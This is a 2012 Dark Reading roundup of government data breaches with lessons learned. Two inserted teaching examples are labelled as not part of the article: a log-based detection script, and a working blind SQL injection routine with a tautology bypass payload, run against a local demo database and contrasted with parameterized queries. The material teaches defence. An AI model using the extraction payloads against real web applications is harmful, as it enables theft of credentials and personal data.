Dark Reading is part of the Informa Tech Division of Informa PLC



10 Top Government Data Breaches Of 2012

SQL injection, post-phishing privilege escalation, and poorly secured back-up information all played their part in exposing sensitive government data stores this year

With federal and local government agencies suffering the brunt of Anonymous protests, targeted phishing attacks leading to privilege escalation, and highly effective SQL injection attacks granting wide-scale access to information, citizen privacy definitely took a hit in 2012.

1. South Carolina
More than 3.3 million unencrypted bank account numbers and 3.8 million tax returns were stolen in a wide-ranging attack against the South Carolina Department of Revenue. It all started with a state employee falling for a phishing email; the attackers then used that employee's access rights to reach the department's systems and databases.

Lessons Learned: Database protection layers such as database activity monitoring, along with network-level detection, could have gone a long way toward limiting the damage from the kind of phishing attack that every organization, public and private, faces today. A phished credential is a valid credential, so the signal to watch for is not the login itself but what the account does afterward: bulk reads from sensitive tables, connections from unfamiliar hosts, and query volumes out of line with the account's history.
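The kind of post-phishing behaviour a database activity monitor is meant to catch, as an added example that is not part of the original article: three simple rules run over constructed query-audit lines (the key=value log format, table names, user names, IP addresses and thresholds are all assumptions for illustration). The large row counts in the last two lines mirror the numbers reported for the South Carolina breach; the account is legitimate, so it is the volume and the new source address that stand out.

```python
"""Added example (not from the Dark Reading article): a minimal
database-activity-monitoring rule set over constructed audit lines.
Log format, table names, users, addresses and thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime

SENSITIVE_TABLES = {"tax_returns", "bank_accounts"}   # assumed data classification
BULK_ROWS = 10_000        # rows returned by one statement that trips an alert
HOURLY_ROWS = 50_000      # cumulative rows per account per hour

# Constructed sample audit log (chronological). A clerk's normal daytime
# lookups, a batch report, then the same clerk's account pulling whole
# tables from an outside address late at night.
SAMPLE_LOG = """\
2012-08-27T14:01:05 user=jsmith src=10.20.4.17 obj=tax_returns rows=1
2012-08-27T14:02:40 user=jsmith src=10.20.4.17 obj=tax_returns rows=3
2012-08-27T14:03:11 user=jsmith src=10.20.4.17 obj=bank_accounts rows=1
2012-08-27T15:10:00 user=batch_rpt src=10.20.4.50 obj=summary_stats rows=25000
2012-08-27T23:12:09 user=jsmith src=203.0.113.45 obj=tax_returns rows=3800000
2012-08-27T23:14:50 user=jsmith src=203.0.113.45 obj=bank_accounts rows=3300000
"""

LINE_RE = re.compile(r"^(\S+) user=(\S+) src=(\S+) obj=(\S+) rows=(\d+)$")


def parse(line):
    """Parse one audit line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, user, src, obj, rows = m.groups()
    return {"ts": datetime.fromisoformat(ts), "user": user, "src": src,
            "obj": obj, "rows": int(rows)}


def detect(log_text):
    """Return a list of (rule, user, detail, rows) alerts, in log order."""
    alerts = []
    seen_src = defaultdict(set)   # user -> source addresses seen so far
    hourly = defaultdict(int)     # (user, hour bucket) -> rows returned
    for raw in log_text.splitlines():
        ev = parse(raw)
        if ev is None:
            continue
        # Rule 1: one statement pulling a bulk result from a sensitive table.
        if ev["obj"] in SENSITIVE_TABLES and ev["rows"] >= BULK_ROWS:
            alerts.append(("BULK_READ", ev["user"], ev["obj"], ev["rows"]))
        # Rule 2: a known account appearing from an address never seen for it
        # (a phished credential replayed from the attacker's own machine).
        if seen_src[ev["user"]] and ev["src"] not in seen_src[ev["user"]]:
            alerts.append(("NEW_SOURCE", ev["user"], ev["src"], ev["rows"]))
        seen_src[ev["user"]].add(ev["src"])
        # Rule 3: cumulative rows per account per hour crossing the threshold
        # (fires once, when the running total first crosses it).
        key = (ev["user"], ev["ts"].replace(minute=0, second=0))
        before = hourly[key]
        hourly[key] += ev["rows"]
        if before < HOURLY_ROWS <= hourly[key]:
            alerts.append(("HOURLY_VOLUME", ev["user"], str(key[1]), hourly[key]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The thresholds are deliberately crude; a real monitor would baseline each account's row counts and hours of activity rather than use fixed numbers. The point is that every alert here fires on a session authenticated with a perfectly valid password.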


2. California Department of Social Services
Sensitive payroll information about approximately 700,000 individuals was lost in the mail en route between IT contractors at Hewlett Packard and the California Department of Social Services. Caregiver and care recipient names, wages, and Social Security numbers were exposed when a package sent by U.S. Postal Service, containing microfiche with the information, arrived damaged with much of the data missing.

Lessons Learned: Database contents are often most vulnerable once the information is put into more archaic forms such as paper and microfiche. This breach proves that physical security and common sense still play a big role in data privacy protection.

3. Utah Department of Health
The health information and PII of more than 780,000 Utah citizens were put at risk when Eastern European hackers broke into a server maintained by the Utah Department of Technology Services this spring by taking advantage of poor authentication configuration following database migration to a new server.

Lessons Learned: Poor authentication controls, uneven patch management, and dicey configuration management add an inordinate amount of risk to the database protection equation. A migration is exactly the moment when default credentials and loosened access settings tend to slip through.

4. California Department of Child Support Services
Californians suffered not one, but two huge breach events stemming from old-school data storage and questionable shipping of unobfuscated files. The California Department of Child Support Services lost more than 800,000 sensitive health and financial records when a FedEx shipment of backup tapes, sent by the state's contractors IBM and Iron Mountain, fell off the proverbial truck.

Lessons Learned: Just because a database is on a backup tape or drive does not make the information contained within any less valuable or vulnerable. Protection of backup media, encryption of the data on it included, needs to be written into data protection policies.

5. United States Bureau of Justice Statistics
Anonymous embarrassed the United States Bureau of Justice Statistics (BJS) when it leaked 1.7 GB of sensitive data belonging to the bureau on The Pirate Bay this spring. Files included internal emails and a database dump with information from the BJS website.

Lessons Learned: While information stolen was generally publicly available anyhow, the database dump offers yet another example of how insecure Web applications put entire back-end databases at risk.

6. City of Springfield
Though government officials report that the number of citizens stung by a recent hack of the website run by the City of Springfield was only about 2,100, the perpetrators from Anonymous said they actually were able to steal from municipal databases that included more than 1,000 vehicle descriptions from online police reports and records from more than 280,000 summonses filed in city digital data stores. The grey hat hackers claimed to have more than they leaked to the public, reporting that they removed sensitive information as a public service to citizens.

Lessons Learned: Speculation on this one is that it was carried out through SQL injection. Even smaller municipalities are going to find themselves targets of SQLi attacks if they leave the Web app barn door open.

7. United States Navy & DHS
Hackers from a group calling itself Digital Corruption busted into Department of Homeland Security and U.S. Navy websites using Blind SQL injection attacks. They stole database information that included usernames, passwords, email IDs, and security questions and answers for all users on the Navy's Smart Web Move website and Homeland Security's Transportation Worker Identification Credential website.

Lessons Learned: As long as organizations build SQL statements by splicing user input into query text, hackers will continue to run roughshod with these kinds of attacks. Parameterized queries (prepared statements) are the fix; input validation is a worthwhile second layer, not a substitute. Blind SQL injection deserves special mention because the application never has to display an error or a result set for the attacker to pull data out: a simple true/false difference in the response is enough.
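What that true/false difference gives an attacker, and how the parameterized rewrite removes it, as an added example that is not code from the article or from any of the sites it names: a user-existence check written with string concatenation, the boolean-based blind injection that recovers a stored password from it one character at a time, and the hardened version against which the same payloads do nothing. It runs against an in-memory SQLite table; the table layout, user names and passwords are constructed for illustration.

```python
"""Added example (not from the Dark Reading article): string-built SQL versus
parameterized SQL, and a boolean-based blind SQL injection against the former.
Runs offline on an in-memory SQLite database with constructed sample rows."""
import sqlite3


def make_db():
    """Constructed sample table; plaintext passwords here only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("admin", "S3cr3t!", "admin@example.gov"),
                      ("clerk", "winter2012", "clerk@example.gov")])
    return conn


def user_exists_vulnerable(conn, username):
    """VULNERABLE: attacker-controlled text becomes part of the SQL statement."""
    sql = "SELECT 1 FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone() is not None


def user_exists_safe(conn, username):
    """HARDENED: the value is bound as a parameter and can never act as SQL syntax."""
    sql = "SELECT 1 FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone() is not None


def blind_extract_password(probe, target_user, max_len=32):
    """Boolean-based blind SQL injection.

    `probe(username)` is the application's only observable behaviour: True if
    a row matched, False otherwise. The attacker turns that single bit into a
    sequence of yes/no questions about each character of the stored password.
    """
    charset = ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
               "0123456789!@#$%^&*")
    recovered = ""
    for pos in range(1, max_len + 1):
        found = False
        for ch in charset:
            # Close the quoted literal, add a condition on one character of the
            # password column, and comment out the rest of the statement.
            payload = f"{target_user}' AND substr(password,{pos},1)='{ch}' --"
            if probe(payload):
                recovered += ch
                found = True
                break
        if not found:
            break   # no character matched at this position: end of the value
    return recovered


if __name__ == "__main__":
    db = make_db()
    bypass = "nobody' OR '1'='1"
    print("tautology bypass, vulnerable:", user_exists_vulnerable(db, bypass))
    print("tautology bypass, safe:      ", user_exists_safe(db, bypass))
    print("blind extraction, vulnerable:",
          blind_extract_password(lambda u: user_exists_vulnerable(db, u), "admin"))
    print("blind extraction, safe:      ",
          blind_extract_password(lambda u: user_exists_safe(db, u), "admin"))
```

Against the vulnerable function the extraction returns the admin password in well under a thousand requests; against the parameterized one every probe is just a lookup for a username that does not exist, so nothing comes back. Note that the charset and the `substr()` call are SQLite's; the same technique on another engine uses that engine's string functions, which is why the fix belongs in the query code rather than in a blocklist of keywords.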

8. Wisconsin Department of Revenue
South Carolina's tax authorities weren't the only government tax office to suffer an embarrassing breach in 2012. In July, the Wisconsin Department of Revenue reported that it had exposed sensitive seller information on more than 110,000 people and businesses who sold property in 2011. A Microsoft Access file of public-facing sales data carried an embedded file, unnoticed by the staff who published it, that contained the sensitive information; the report was available to real estate professionals from April through July.

Lessons Learned: Sometimes our databases' worst enemies aren't hackers, but, instead, unknowledgeable employees who put sensitive information in the most inopportune of places.

9. NASA
Although the roughly 10,000 employees affected by the latest security lapse at NASA is a fairly small number compared with other big-number government privacy breaches this year, the circumstances offer glaring evidence of how government agencies still lag in employee awareness and training. Personally identifiable information was left on an unencrypted agency laptop, which was subsequently stolen from an employee's car on Halloween.

Lessons Learned: When large caches of information are transferred from the database, who knows where they'll end up. The NASA breach shows once again how easy it is for unencrypted information on laptops to "walk away" from authorized users.

10. New Hampshire Department of Corrections
In a case of the foxes running the hen house, the New Hampshire Department of Corrections found that inmates at a state correctional facility were able to access the main offender management database system. How so? That system was linked to a server that inmates working in the prison industries shops used. Access to the system would allow inmates to change items like parole dates and sentencing information, as well as view personally identifiable information on prison staff members.

Lessons Learned: This case offers a stark example of why highly sensitive databases require network segmentation so that they cannot be reached through an adjacent, less trusted system. A database is only as isolated as every host that can open a connection to it.

12/7/2012 | 12:23:00 PM
re: 10 Top Government Data Breaches Of 2012
Really great and resourceful article! I personally enjoyed it really much, maybe because it perfectly proves our vital need for a Cyber Security Bill that has measurable accountability controls and/or we suffer an attack that takes out our power grid or another piece of critical infrastructure. I know there's a lot of fear mongering out there which is unfortunate as it then becomes difficult for people to separate the wheat from the chaff. I've been in the IT Security space for enough time to understand how fragile our corporate and government infrastructure is. Actually, here's an interesting article on this matter: http://blog.securityinnovation.... Hope you find it useful!